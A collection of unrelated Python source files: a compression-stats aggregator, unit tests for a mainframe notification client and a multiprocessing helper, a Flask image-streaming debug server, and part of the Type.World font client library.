agg_job_results['agg_run_stats'][key]['total_duration'] += job_results['agg_run_stats'][key]['total_duration']
agg_job_results['agg_run_stats'][key]['max_error'] = max(agg_job_results['agg_run_stats'][key]['max_error'], job_results['agg_run_stats'][key]['max_error'])
agg_job_results['agg_run_stats'][key]['num_runs'] += job_results['agg_run_stats'][key]['num_runs']
for i in range(19):
agg_job_results['agg_run_stats'][key]['bit_rates'][i] += job_results['agg_run_stats'][key]['bit_rates'][i]
if job_results['best_runs']['best_error'] < agg_job_results['best_runs']['best_error']:
agg_job_results['best_runs']['best_error'] = job_results['best_runs']['best_error']
agg_job_results['best_runs']['best_error_entry'] = job_results['best_runs']['best_error_entry']
if job_results['best_runs']['best_ratio'] > agg_job_results['best_runs']['best_ratio']:
agg_job_results['best_runs']['best_ratio'] = job_results['best_runs']['best_ratio']
agg_job_results['best_runs']['best_ratio_entry'] = job_results['best_runs']['best_ratio_entry']
if job_results['worst_runs']['worst_error'] > agg_job_results['worst_runs']['worst_error']:
agg_job_results['worst_runs']['worst_error'] = job_results['worst_runs']['worst_error']
agg_job_results['worst_runs']['worst_error_entry'] = job_results['worst_runs']['worst_error_entry']
if job_results['worst_runs']['worst_ratio'] < agg_job_results['worst_runs']['worst_ratio']:
agg_job_results['worst_runs']['worst_ratio'] = job_results['worst_runs']['worst_ratio']
agg_job_results['worst_runs']['worst_ratio_entry'] = job_results['worst_runs']['worst_ratio_entry']
if __name__ == "__main__":
options = parse_argv()
stat_files = compress_clips(options)
csv_data = create_csv(options)
aggregating_start_time = time.clock();
stat_queue = multiprocessing.Queue()
for stat_filename in stat_files:
stat_queue.put(stat_filename)
# Add a marker to terminate the jobs
for i in range(options['num_threads']):
stat_queue.put(None)
result_queue = multiprocessing.Queue()
jobs = [ multiprocessing.Process(target = run_stat_parsing, args = (options, stat_queue, result_queue)) for _i in range(options['num_threads']) ]
for job in jobs:
job.start()
agg_job_results = {}
num_stat_file_processed = 0
print_progress(num_stat_file_processed, len(stat_files), 'Aggregating results:', '{} / {}'.format(num_stat_file_processed, len(stat_files)))
try:
while True:
try:
(msg, data) = result_queue.get(True, 1.0)
if msg == 'progress':
num_stat_file_processed += 1
print_progress(num_stat_file_processed, len(stat_files), 'Aggregating results:', '{} / {}'.format(num_stat_file_processed, len(stat_files)))
elif msg == 'done':
aggregate_job_stats(agg_job_results, data)
append_csv(csv_data, data)
except queue.Empty:
all_jobs_done = True
for job in jobs:
if job.is_alive():
all_jobs_done = False
if all_jobs_done:
break
except KeyboardInterrupt:
sys.exit(1)
agg_run_stats = agg_job_results['agg_run_stats']
best_runs = agg_job_results['best_runs']
worst_runs = agg_job_results['worst_runs']
num_runs = agg_job_results['num_runs']
total_compression_time = agg_job_results['total_compression_time']
write_csv(csv_data, agg_run_stats)
aggregating_end_time = time.clock();
print()
print('Found {} runs in {}'.format(num_runs, format_elapsed_time(aggregating_end_time - aggregating_start_time)))
print()
close_csv(csv_data)
print('Stats per run type:')
run_types_by_size = sorted(agg_run_stats.values(), key = lambda entry: entry['total_compressed_size'])
for run_stats in run_types_by_size:
ratio = float(run_stats['total_raw_size']) / float(run_stats['total_compressed_size'])
print('Compressed {:.2f} MB, Elapsed {}, Ratio [{:.2f} : 1], Max error [{:.4f}] Run type: {}'.format(bytes_to_mb(run_stats['total_compressed_size']), format_elapsed_time(run_stats['total_compression_time']), ratio, run_stats['max_error'], run_stats['name']))
print()
total_duration = run_types_by_size[0]['total_duration']
total_raw_size = run_types_by_size[0]['total_raw_size']
print('Sum of clip durations: {}'.format(format_elapsed_time(total_duration)))
print('Total compression time: {}'.format(format_elapsed_time(total_compression_time)))
print('Total raw size: {:.2f} MB'.format(bytes_to_mb(total_raw_size)))
print()
print('Most accurate: {}'.format(best_runs['best_error_entry']['filename']))
print_stat(best_runs['best_error_entry'])
print('Best ratio: {}'.format(best_runs['best_ratio_entry']['filename']))
print_stat(best_runs['best_ratio_entry'])
print('Least accurate: {}'.format(worst_runs['worst_error_entry']['filename']))
print_stat(worst_runs['worst_error_entry'])
print('Worst ratio: {}'.format(worst_runs['worst_ratio_entry']['filename']))
print_stat(worst_runs['worst_ratio_entry'])
|
test_notification.py
|
# Copyright 2016-2017 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for _notification module.
The test strategy is to mock the STOMP messages of the HMC using the
requests_mock package.
"""
from __future__ import absolute_import, print_function
import json
import threading
from mock import patch
from zhmcclient._notification import NotificationReceiver
class MockedStompConnection(object):
"""
A class that replaces stomp.Connection for the usage scope in the
zhmcclient._notification module, and that adds the ability to
queue STOMP messages.
"""
def __init__(self, *args, **kwargs):
"""We ignore the args:
[(self._host, self._port)], use_ssl="SSL")
"""
self._state_connected = False
self._listener = None
self._connect_userid = None
self._connect_password = None
self._connect_wait = None
self._subscriptions = [] # items: tuple(dest, id, ack)
self._queued_messages = [] # items: tuple(headers, message_str)
self._sender_thread = None
def set_listener(self, name, listener):
"""Mocks the same-named method of stomp.Connection."""
assert not self._state_connected
self._listener = listener
def start(self):
"""Mocks the same-named method of stomp.Connection."""
assert not self._state_connected
def connect(self, userid, password, wait):
"""Mocks the same-named method of stomp.Connection."""
assert not self._state_connected
self._state_connected = True
self._connect_userid = userid
self._connect_password = password
self._connect_wait = wait
def subscribe(self, destination, id, ack):
"""Mocks the same-named method of stomp.Connection."""
assert self._state_connected
self._subscriptions.append((destination, id, ack))
def disconnect(self):
"""Mocks the same-named method of stomp.Connection."""
assert self._state_connected
self._sender_thread.join()
self._sender_thread = None
self._state_connected = False
def mock_add_message(self, headers, message_obj):
"""Adds a STOMP message to the queue."""
assert self._sender_thread is None
message_str = json.dumps(message_obj)
self._queued_messages.append((headers, message_str))
def mock_start(self):
"""Start the STOMP message sender thread."""
assert self._state_connected
self._sender_thread = threading.Thread(target=self.mock_sender_run)
self._sender_thread.start()
def mock_sender_run(self):
"""Simulates the HMC sending STOMP messages. This method runs in a
separate thread and processes the queued STOMP messages and sends
them to the notification listener set up by the NotificationReceiver
class."""
for msg_item in self._queued_messages:
# The following method blocks until it can deliver a message
headers, message_str = msg_item
self._listener.on_message(headers, message_str)
self._listener.on_disconnected()
def receiver_run(receiver, msg_items):
for headers, message in receiver.notifications():
msg_items.append((headers, message))
return msg_items
def receive_notifications(receiver):
msg_items = []
receiver_thread = threading.Thread(target=receiver_run,
args=(receiver, msg_items))
receiver_thread.start()
receiver.close()
receiver_thread.join(1.0)
if receiver_thread.is_alive():
raise AssertionError("receiver_thread is still alive")
return msg_items
class TestNotification_OneTopic(object):
def setup_method(self):
self.topic = 'fake-topic'
self.hmc = 'fake-hmc'
self.userid = 'fake-userid'
self.password = 'fake-password'
self.std_headers = {
'notification-type': 'fake-type'
}
@patch(target='stomp.Connection', new=MockedStompConnection)
def test_no_messages(self):
receiver = NotificationReceiver(self.topic, self.hmc, self.userid,
self.password)
conn = receiver._conn
# We do not add any STOMP messages
conn.mock_start()
msg_items = receive_notifications(receiver)
assert msg_items == []
@patch(target='stomp.Connection', new=MockedStompConnection)
def test_one_message(self):
receiver = NotificationReceiver(self.topic, self.hmc, self.userid,
self.password)
conn = receiver._conn
# Add one STOMP message to be sent
message_obj = dict(a=1, b=2)
conn.mock_add_message(self.std_headers, message_obj)
conn.mock_start()
msg_items = receive_notifications(receiver)
assert len(msg_items) == 1
msg0 = msg_items[0]
assert msg0[0] == self.std_headers
assert msg0[1] == message_obj
class TestNotification_TwoTopics(object):
def setup_method(self):
self.topics = ('fake-topic1', 'fake-topic2')
self.hmc = 'fake-hmc'
self.userid = 'fake-userid'
self.password = 'fake-password'
self.std_headers = {
'notification-type': 'fake-type'
}
@patch(target='stomp.Connection', new=MockedStompConnection)
def test_no_messages(self):
receiver = NotificationReceiver(self.topics, self.hmc, self.userid,
self.password)
conn = receiver._conn
# We do not add any STOMP messages
conn.mock_start()
msg_items = receive_notifications(receiver)
assert msg_items == []
@patch(target='stomp.Connection', new=MockedStompConnection)
def test_one_message(self):
receiver = NotificationReceiver(self.topics, self.hmc, self.userid,
self.password)
conn = receiver._conn
# Add one STOMP message to be sent
message_obj = dict(a=1, b=2)
conn.mock_add_message(self.std_headers, message_obj)
conn.mock_start()
msg_items = receive_notifications(receiver)
assert len(msg_items) == 1
msg0 = msg_items[0]
assert msg0[0] == self.std_headers
assert msg0[1] == message_obj
|
phlsys_multiprocessing__t.py
|
"""Test suite for phlsys_multiprocessing."""
# =============================================================================
# TEST PLAN
# -----------------------------------------------------------------------------
# Here we detail the things we are concerned to test and specify which tests
# cover those concerns.
#
# Concerns:
# TODO
# -----------------------------------------------------------------------------
# Tests:
# TODO
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import multiprocessing
import unittest
import phlsys_multiprocessing
class Test(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_logging_context_breathing(self):
def logger_config():
logging.basicConfig()
with phlsys_multiprocessing.logging_context(logger_config):
logging.debug("logging test")
def test_multiresource_breathing(self):
def factory():
return "resource"
# make sure that we can get a resource in the main process
multi_resource = phlsys_multiprocessing.MultiResource(1, factory)
with multi_resource.resource_context() as resource:
self.assertEqual("resource", resource)
with multi_resource.resource_context() as resource:
self.assertEqual("resource", resource)
def test_multiresource_changes_propagate(self):
def worker(resource):
with resource.resource_context() as r:
r.append("worker process")
def factory():
return ["main process"]
multi_resource = phlsys_multiprocessing.MultiResource(1, factory)
worker_list = []
num_workers = 5
for _ in xrange(num_workers):
worker_list.append(
multiprocessing.Process(target=worker, args=(multi_resource,)))
worker_list[-1].start()
for w in worker_list:
w.join()
with multi_resource.resource_context() as r:
self.assertEqual(len(r), num_workers + 1)
# -----------------------------------------------------------------------------
# Copyright (C) 2014 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------ END-OF-FILE ----------------------------------
|
debug_server.py
|
import threading
import cv2
import numpy as np
from flask import Flask, Response, render_template_string, abort
app = Flask(__name__)
image_container = {}
def camera_stream(image_name):
if image_name not in image_container:
return abort(404)
while True:
_, payload = cv2.imencode('.jpg', image_container[image_name])
frame = payload.tobytes()
yield (b'--frame/r/n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
INDEX_TEMPLATE = """
<body>
<ul>
{% for image_stream in image_stream_list %}
<li>
<a href="{{url_for('stream_page', image_name=image_stream)}}">{{image_stream}}</a>
</li>
{% endfor %}
</ul>
</body>
"""
STREAM_PAGE_TEMPLATE = """
<body>
<img src="{{url_for('video_feed', image_name=image_name)}}" height="100%">
</body>
"""
@app.route('/image_stream/<image_name>')
def video_feed(image_name):
return Response(camera_stream(image_name),
mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/image_frame/<image_name>')
def video_frame(image_name):
image = image_container.get(image_name, None)
if image is None:
return abort(404)
_, payload = cv2.imencode('.jpg', image)
frame = payload.tobytes()
return Response(frame, mimetype='image/jpeg')
@app.route("/stream_page/<image_name>")
def stream_page(image_name):
return render_template_string(STREAM_PAGE_TEMPLATE, image_name=image_name)
@app.route('/')
def index():
return render_template_string(INDEX_TEMPLATE,
image_stream_list=image_container.keys())
def create_image_server():
"""
Create flask image debug server.
Warning! This is a very hacky flask server. Make sure to only run this once as it uses global stare
Returns:
Dictionary into which you can insert images with string keys
"""
threading.Thread(target=lambda: app.run(host="0.0.0.0", port=8000)).start()
return image_container
|
__init__.py
|
# -*- coding: utf-8 -*-
import os
import sys
import json
import copy
import platform
import urllib.request
import urllib.error
import urllib.parse
import traceback
import time
import base64
import threading
import ssl
import certifi
import semver
import logging
import inspect
import re
from time import gmtime, strftime
import http.client as httplib
import stripe.http_client
import typeworld.api
from typeworld.client.helpers import (
ReadFromFile,
WriteToFile,
MachineName,
OSName,
Garbage,
)
WIN = platform.system() == "Windows"
MAC = platform.system() == "Darwin"
LINUX = platform.system() == "Linux"
CI = os.getenv("CI", "false").lower() == "true"
GAE = os.getenv("GAE_ENV", "").startswith("standard")
MOTHERSHIP = "https://api.type.world/v1"
if MAC:
from AppKit import NSUserDefaults
from typeworld.client.helpers import nslog
class DummyKeyring(object):
def __init__(self):
self.passwords = {}
def set_password(self, key, username, password):
self.passwords[(key, username)] = password
def get_password(self, key, username):
if (key, username) in self.passwords:
return self.passwords[(key, username)]
def delete_password(self, key, username):
if (key, username) in self.passwords:
del self.passwords[(key, username)]
dummyKeyRing = DummyKeyring()
if "TRAVIS" in os.environ:
import tempfile
tempFolder = tempfile.mkdtemp()
def urlIsValid(url):
if not url.find("typeworld://") < url.find("+") < url.find("http") < url.find("//", url.find("http")):
return False, "URL is malformed."
if url.count("@") > 1:
return (
False,
"URL contains more than one @ sign, so don’t know how to parse it.",
)
found = False
for protocol in typeworld.api.PROTOCOLS:
if url.startswith(protocol + "://"):
found = True
break
if not found:
return (
False,
"Unknown custom protocol, known are: %s" % (typeworld.api.PROTOCOLS),
)
if url.count("://") > 1:
return (
False,
"URL contains more than one :// combination, so don’t know how to parse it.",
)
return True, None
class URL(object):
def __init__(self, url):
(
self.customProtocol,
self.protocol,
self.transportProtocol,
self.subscriptionID,
self.secretKey,
self.accessToken,
self.restDomain,
) = splitJSONURL(url)
def unsecretURL(self):
if self.subscriptionID and self.secretKey:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.subscriptionID)
+ ":"
+ "secretKey"
+ "@"
+ str(self.restDomain)
)
elif self.subscriptionID:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.subscriptionID)
+ "@"
+ str(self.restDomain)
)
else:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.restDomain)
)
def shortUnsecretURL(self):
if self.subscriptionID:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.subscriptionID)
+ "@"
+ str(self.restDomain)
)
else:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.restDomain)
)
def secretURL(self):
if self.subscriptionID and self.secretKey:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.subscriptionID)
+ ":"
+ str(self.secretKey)
+ "@"
+ str(self.restDomain)
)
elif self.subscriptionID:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.subscriptionID)
+ "@"
+ str(self.restDomain)
)
else:
return (
str(self.customProtocol)
+ str(self.protocol)
+ "+"
+ str(self.transportProtocol.replace("://", "//"))
+ str(self.restDomain)
)
def HTTPURL(self):
return str(self.transportProtocol) + str(self.restDomain)
def getProtocol(url):
"""\
Loads a protocol plugin from the file system and returns an
instantiated protocol object
"""
protocolName = URL(url).protocol
for ext in (".py", ".pyc"):
if os.path.exists(os.path.join(os.path.dirname(__file__), "protocols", protocolName + ext)):
import importlib
spec = importlib.util.spec_from_file_location(
"json",
os.path.join(os.path.dirname(__file__), "protocols", protocolName + ext),
)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
protocolObject = module.TypeWorldProtocol(url)
return True, protocolObject
return False, "Protocol %s doesn’t exist in this app (yet)." % protocolName
def request(url, parameters={}, method="POST", timeout=30):
"""Perform request in a loop 10 times, because the central server’s instance might
shut down unexpectedly during a request, especially longer running ones."""
client = stripe.http_client.new_default_http_client(timeout=timeout)
message = None
tries = 10
for i in range(tries):
try:
# This is awkward, but currently the only workaround:
# I can't get GAE to accept http requests coming from itself, such as
# when typeworld is loaded as a module inside type.world and then
# needs to access type.world for communication.
# Thus, we're routing all internal traffic directly to flask via its
# test_client():
try:
import typeworldserver
print("typeworld in GAE")
GAE = True
except ImportError:
GAE = False
if GAE and ("api.type.world" in url or "typeworld2.appspot.com" in url):
print("routing internally to flask")
if "api.type.world" in url:
url = url.split("api.type.world")[-1]
elif "typeworld2.appspot.com" in url:
url = url.split("typeworld2.appspot.com")[-1]
with typeworldserver.app.test_client() as c:
if method == "POST":
response = c.post(url, data=parameters)
return True, response.data, response.headers
elif method == "GET":
response = c.get(url)
return True, response.data, response.headers
content, status_code, headers = client.request(method, url, {}, parameters)
except Exception:
# Continue the loop directly unless this is last round
if i < tries - 1:
continue
# Output error message
if parameters:
parameters = copy.copy(parameters)
for key in parameters:
if key.lower().endswith("key"):
parameters[key] = "*****"
if key.lower().endswith("secret"):
parameters[key] = "*****"
message = (
f"Response from {url} with parameters {parameters} after {i+1} tries: "
+ traceback.format_exc().splitlines()[-1]
)
else:
message = traceback.format_exc().splitlines()[-1]
return False, message, None
client.close()
if status_code == 200:
return True, content, headers
else:
return False, f"HTTP Error {status_code}", headers
# try:
# # This is awkward, but currently the only workaround:
# # I can't get GAE to accept http requests coming from itself, such as
# # when typeworld is loaded as a module inside type.world and then
# # needs to access type.world for communication.
# # Thus, we're routing all internal traffic directly to flask via its
# # test_client():
# try:
# import main
# GAE = True
# except ImportError:
# GAE = False
# if GAE and ("api.type.world" in url or "typeworld2.appspot.com" in url):
# if "api.type.world" in url:
# url = url.split("api.type.world")[-1]
# elif "typeworld2.appspot.com" in url:
# url = url.split("typeworld2.appspot.com")[-1]
# with main.app.test_client() as c:
# if method == "POST":
# response = c.post(url, data=parameters)
# return True, response.data, None
# elif method == "GET":
# response = c.get(url)
# return True, response.data, None
# if method == "POST":
# response = requests.post(url, parameters, timeout=timeout)
# elif method == "GET":
# response = requests.get(url, timeout=timeout)
# except Exception:
# if parameters:
# parameters = copy.copy(parameters)
# for key in parameters:
# if key.lower().endswith("key"):
# parameters[key] = "*****"
# if key.lower().endswith("secret"):
# parameters[key] = "*****"
# message = (
# f"Response from {url} with parameters {parameters} after {i+1} tries: "
# + traceback.format_exc().splitlines()[-1]
# )
# else:
# message = traceback.format_exc().splitlines()[-1]
# return False, message, None
# else:
# # try:
# if response.status_code != 200:
# return False, f"HTTP Error {response.status_code}", response
# else:
# return True, response.content, response
def splitJSONURL(url):
customProtocol = "typeworld://"
url = url.replace(customProtocol, "")
protocol = url.split("+")[0]
url = url.replace(protocol + "+", "")
url = url.replace("http//", "http://")
url = url.replace("https//", "https://")
url = url.replace("HTTP//", "http://")
url = url.replace("HTTPS//", "https://")
transportProtocol = None
if url.startswith("https://"):
transportProtocol = "https://"
elif url.startswith("http://"):
transportProtocol = "http://"
urlRest = url[len(transportProtocol) :]
subscriptionID = ""
secretKey = ""
accessToken = ""
# With credentials
if "@" in urlRest:
credentials, domain = urlRest.split("@")
credentialParts = credentials.split(":")
if len(credentialParts) == 3:
subscriptionID, secretKey, accessToken = credentialParts
elif len(credentialParts) == 2:
subscriptionID, secretKey = credentialParts
elif len(credentialParts) == 1:
subscriptionID = credentialParts[0]
# No credentials given
else:
domain = urlRest
return (
customProtocol,
protocol,
transportProtocol,
subscriptionID,
secretKey,
accessToken,
domain,
)
class Preferences(object):
def __init__(self):
self._dict = {} # nocoverage
# (In tests, preferences are loaded either as JSON or as AppKitNSUserDefaults,
# not the plain class here)
def get(self, key):
if key in self._dict:
return self._dict[key]
def set(self, key, value):
self._dict[key] = value
self.save()
def remove(self, key):
if key in self._dict:
del self._dict[key]
self.save()
def save(self):
pass
def dictionary(self):
return self._dict # nocoverage
# (In tests, preferences are loaded either as JSON or as AppKitNSUserDefaults,
# not the plain class here)
class JSON(Preferences):
def __init__(self, path):
self.path = path
self._dict = {}
if self.path and os.path.exists(self.path):
self._dict = json.loads(ReadFromFile(self.path))
def save(self):
if not os.path.exists(os.path.dirname(self.path)):
os.makedirs(os.path.dirname(self.path))
WriteToFile(self.path, json.dumps(self._dict))
def dictionary(self):
return self._dict
class AppKitNSUserDefaults(Preferences):
def __init__(self, name):
# NSUserDefaults = objc.lookUpClass('NSUserDefaults')
self.defaults = NSUserDefaults.alloc().initWithSuiteName_(name)
self.values = {}
def get(self, key):
if key in self.values:
return self.values[key]
else:
o = self.defaults.objectForKey_(key)
if o:
if "Array" in o.__class__.__name__:
o = list(o)
elif "Dictionary" in o.__class__.__name__:
o = dict(o)
elif "unicode" in o.__class__.__name__:
o = str(o)
self.values[key] = o
return self.values[key]
def set(self, key, value):
# self.defaults.setObject_forKey_(json.dumps(value), key)
# if MAC:
# if type(value) == dict:
# value = NSDictionary.alloc().initWithDictionary_(value)
self.values[key] = value
self.defaults.setObject_forKey_(value, key)
def remove(self, key):
if key in self.values:
del self.values[key]
if self.defaults.objectForKey_(key):
self.defaults.removeObjectForKey_(key)
def convertItem(self, item):
if "Array" in item.__class__.__name__ or type(item) in (list, tuple):
_list = list(item)
for i, _item in enumerate(_list):
_list[i] = self.convertItem(_item)
return _list
elif "Dictionary" in item.__class__.__name__ or type(item) == dict:
d = dict(item)
for k, v in d.items():
d[k] = self.convertItem(v)
return d
elif "unicode" in item.__class__.__name__:
return str(item)
def dictionary(self):
d = self.defaults.dictionaryRepresentation()
return self.convertItem(d)
class TypeWorldClientDelegate(object):
def __init__(self):
self.client = None
self.initialize()
def initialize(self):
pass
def _fontWillInstall(self, font):
try:
self.fontWillInstall(font)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def fontWillInstall(self, font):
assert type(font) == typeworld.api.Font
def _fontHasInstalled(self, success, message, font):
try:
self.fontHasInstalled(success, message, font)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def fontHasInstalled(self, success, message, font):
if success:
assert type(font) == typeworld.api.Font
def _fontWillUninstall(self, font):
try:
self.fontWillUninstall(font)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def fontWillUninstall(self, font):
assert type(font) == typeworld.api.Font
def _fontHasUninstalled(self, success, message, font):
try:
self.fontHasUninstalled(success, message, font)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def fontHasUninstalled(self, success, message, font):
if success:
assert type(font) == typeworld.api.Font
def _subscriptionUpdateNotificationHasBeenReceived(self, subscription):
try:
self.subscriptionUpdateNotificationHasBeenReceived(subscription)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def subscriptionUpdateNotificationHasBeenReceived(self, subscription):
assert type(subscription) == typeworld.client.APISubscription
pass
# def _subscriptionInvitationHasBeenReceived(self, invitation):
# try:
# self.subscriptionInvitationHasBeenReceived(invitation)
# except Exception: # nocoverage
# self.client.handleTraceback( # nocoverage
# sourceMethod=getattr(self, sys._getframe().f_code.co_name)
# )
# def subscriptionInvitationHasBeenReceived(self, invitation):
# pass
def _userAccountUpdateNotificationHasBeenReceived(self):
try:
self.userAccountUpdateNotificationHasBeenReceived()
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def userAccountUpdateNotificationHasBeenReceived(self):
pass
def _userAccountHasBeenUpdated(self):
try:
self.userAccountHasBeenUpdated()
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def userAccountHasBeenUpdated(self):
pass
def _userAccountIsReloading(self):
try:
self.userAccountIsReloading()
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def userAccountIsReloading(self):
pass
def _userAccountHasReloaded(self):
try:
self.userAccountHasReloaded()
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def userAccountHasReloaded(self):
pass
def _subscriptionWillDelete(self, subscription):
try:
self.subscriptionWillDelete(subscription)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def subscriptionWillDelete(self, subscription):
pass
def _subscriptionHasBeenDeleted(self, subscription, withinPublisherDeletion=False, remotely=False):
try:
self.subscriptionHasBeenDeleted(subscription, withinPublisherDeletion, remotely)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def subscriptionHasBeenDeleted(self, subscription, withinPublisherDeletion, remotely):
pass
def _publisherWillDelete(self, publisher):
try:
self.publisherWillDelete(publisher)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def publisherWillDelete(self, publisher):
pass
def _publisherHasBeenDeleted(self, publisher):
try:
self.publisherHasBeenDeleted(publisher)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def publisherHasBeenDeleted(self, publisher):
pass
def _subscriptionHasBeenAdded(self, subscription, remotely=False):
try:
self.subscriptionHasBeenAdded(subscription, remotely)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def subscriptionHasBeenAdded(self, subscription, remotely):
pass
def _subscriptionWillUpdate(self, subscription):
try:
self.subscriptionWillUpdate(subscription)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def subscriptionWillUpdate(self, subscription):
pass
def _subscriptionHasBeenUpdated(self, subscription, success, message, changes):
try:
self.subscriptionHasBeenUpdated(subscription, success, message, changes)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def subscriptionHasBeenUpdated(self, subscription, success, message, changes):
pass
def _clientPreferenceChanged(self, key, value):
try:
self.clientPreferenceChanged(key, value)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def clientPreferenceChanged(self, key, value):
pass
def _messageQueueConnected(self):
try:
self.messageQueueConnected()
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def messageQueueConnected(self):
pass
def _messageQueueError(self, status=None):
try:
self.messageQueueError(status=status)
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def messageQueueError(self, status=None):
pass
def _messageQueueLostConnection(self):
try:
self.messageQueueLostConnection()
self.client.zmqRestart()
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def messageQueueLostConnection(self):
pass
def _messageQueueDisconnected(self):
try:
self.messageQueueDisconnected()
except Exception: # nocoverage
self.client.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name)) # nocoverage
def messageQueueDisconnected(self):
pass
class APIInvitation(object):
keywords = ()
def __init__(self, d):
for key in self.keywords:
# if key in d:
setattr(self, key, d[key])
# else:
# setattr(self, key, None)
class APIPendingInvitation(APIInvitation):
keywords = (
"url",
"ID",
"invitedByUserName",
"invitedByUserEmail",
"time",
"canonicalURL",
"publisherName",
"subscriptionName",
"logoURL",
"backgroundColor",
"fonts",
"families",
"foundries",
"websiteURL",
)
def accept(self):
return self.parent.acceptInvitation(self.url)
def decline(self):
return self.parent.declineInvitation(self.url)
class APIAcceptedInvitation(APIInvitation):
keywords = (
"url",
"ID",
"invitedByUserName",
"invitedByUserEmail",
"time",
"canonicalURL",
"publisherName",
"subscriptionName",
"logoURL",
"backgroundColor",
"fonts",
"families",
"foundries",
"websiteURL",
)
class APISentInvitation(APIInvitation):
keywords = (
"url",
"invitedUserName",
"invitedUserEmail",
"invitedTime",
"acceptedTime",
"confirmed",
)
class APIClient(object):
"""\
Main Type.World client app object.
Use it to load repositories and install/uninstall fonts.
"""
def __init__(
self,
preferences=None,
secretTypeWorldAPIKey=None,
delegate=None,
mothership=None,
mode="headless",
zmqSubscriptions=False,
online=False,
testing=False,
externallyControlled=False,
secretServerAuthKey=None,
inCompiledApp=False,
commercial=False,
appID="world.type.headless",
):
try:
self._preferences = preferences or Preferences()
# if self:
# self.clearPendingOnlineCommands()
self._publishers = {}
self._subscriptionsUpdated = []
self.onlineCommandsQueue = []
self._syncProblems = []
self.secretTypeWorldAPIKey = secretTypeWorldAPIKey
self.delegate = delegate or TypeWorldClientDelegate()
self.delegate.client = self
self.mothership = mothership or MOTHERSHIP
self.mode = mode # gui or headless
self.zmqSubscriptions = zmqSubscriptions
self._isSetOnline = online
self.lastOnlineCheck = {}
self.testing = testing
self.externallyControlled = externallyControlled
self.secretServerAuthKey = secretServerAuthKey
self.inCompiledApp = inCompiledApp
self.commercial = commercial
self.appID = appID
self._zmqRunning = False
self._zmqCallbacks = {}
self._zmqStatus = None
self.sslcontext = ssl.create_default_context(cafile=certifi.where())
# For Unit Testing
self.testScenario = None
self._systemLocale = None
self._online = {}
# wentOnline()
if self._isSetOnline and not self.externallyControlled:
self.wentOnline()
# ZMQ
if self._isSetOnline and self.zmqSubscriptions:
